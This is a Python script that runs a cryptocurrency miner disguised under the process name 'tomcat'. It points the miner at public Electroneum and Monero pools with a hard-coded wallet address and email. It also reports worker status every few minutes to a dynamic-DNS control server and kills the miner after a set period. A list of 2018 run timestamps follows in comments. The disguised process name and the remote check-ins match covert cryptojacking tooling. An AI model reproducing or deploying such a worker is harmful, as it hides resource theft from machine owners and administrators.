import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:42:03.655071
#2018-02-17 17:31:06.190363
#2018-02-17 19:19:06.019778
#2018-02-17 21:08:07.533826
#2018-02-17 22:52:03.931427
#2018-02-18 00:37:03.794481
#2018-02-18 02:28:05.188182
#2018-02-18 04:15:08.916045
#2018-02-18 06:06:03.604683
#2018-02-18 07:56:04.695769
#2018-02-18 09:44:01.584608
#2018-02-18 11:31:03.666298
#2018-02-18 13:16:07.462173
#2018-02-18 15:04:05.731756
#2018-02-18 16:52:01.489095
#2018-02-18 18:41:01.824226
#2018-02-18 20:28:01.730717
#2018-02-18 22:13:07.631216
#2018-02-19 00:04:01.518308
#2018-02-19 01:49:05.514331
#2018-02-19 03:37:04.606978
#2018-02-19 05:22:06.234266
#2018-02-19 07:09:01.806294
#2018-02-19 08:58:02.041144
#2018-02-19 10:47:07.414481
#2018-02-19 12:36:06.691475
#2018-02-19 14:25:08.869765
#2018-02-19 16:13:05.979036
#2018-02-19 17:59:08.604841
#2018-02-19 19:47:04.870574
#2018-02-19 21:36:02.063213
#2018-02-19 23:21:07.675910
#2018-02-20 01:07:05.860309
#2018-02-20 02:55:07.278164
#2018-02-20 04:42:08.078984
#2018-02-20 06:26:04.627430
#2018-02-20 08:10:07.782182
#2018-02-20 09:56:01.796194
#2018-02-20 11:39:06.265719
#2018-02-20 13:26:06.235893
#2018-02-20 15:11:04.573405
#2018-02-20 16:58:08.066654
#2018-02-20 18:47:01.832977
#2018-02-20 20:39:08.811663
#2018-02-20 22:24:04.892304
#2018-02-21 00:05:05.010470
#2018-02-21 01:52:06.578961
#2018-02-21 03:39:07.574702
#2018-02-21 05:28:01.695711
#2018-02-21 07:16:05.255444
#2018-02-21 09:01:05.592952
#2018-02-21 10:49:01.775717
#2018-02-21 12:35:06.509651
#2018-02-21 14:21:06.987039
#2018-02-21 16:10:01.640479
#2018-02-21 18:00:15.213188
#2018-02-21 19:46:07.484948
#2018-02-21 21:33:08.108963
#2018-02-21 23:18:01.901002
#2018-02-22 01:08:04.048082
#2018-02-22 02:55:01.427238
#2018-02-22 04:41:08.118870
#2018-02-22 06:26:01.760911
#2018-02-22 08:12:07.461644
#2018-02-22 10:01:08.069493
#2018-02-22 11:45:06.832425
#2018-02-22 13:32:06.700269
#2018-02-22 15:21:08.439668
#2018-02-22 17:08:07.244076
#2018-02-22 18:54:06.502949
#2018-02-22 20:46:05.752934
#2018-02-22 22:32:03.678663
#2018-02-23 00:17:01.485819
#2018-02-23 02:04:02.036446
#2018-02-23 03:52:08.809746
#2018-02-23 05:34:04.865741
#2018-02-23 07:20:01.775513
#2018-02-23 09:25:03.796530
#2018-02-23 11:30:08.507308
#2018-02-23 13:21:07.503356
#2018-02-23 15:08:08.393892
#2018-02-23 16:57:08.161544
#2018-02-23 18:47:02.192571
#2018-02-23 20:33:05.401179
#2018-02-23 22:21:01.827523
#2018-02-24 00:06:07.056252
#2018-02-24 01:56:07.451225
#2018-02-24 03:48:04.665576
#2018-02-24 05:36:06.211612
#2018-02-24 07:23:02.153493
#2018-02-24 09:12:01.475434
#2018-02-24 11:08:05.089476
#2018-02-24 12:56:05.275593
#2018-02-24 14:44:06.101139
#2018-02-24 16:36:02.222355
#2018-02-24 18:31:07.545673
#2018-02-24 20:18:01.508028
#2018-02-24 22:11:06.358702
#2018-02-25 01:08:03.594044
#2018-02-25 03:59:03.980726
#2018-02-25 06:42:07.038333
#2018-02-25 11:36:06.005055
#2018-02-25 13:39:02.015870
#2018-02-25 15:13:01.305652